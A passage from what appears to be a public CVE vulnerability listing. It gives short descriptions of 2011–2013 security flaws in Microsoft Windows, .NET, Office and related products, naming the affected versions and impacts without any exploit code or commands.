operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting 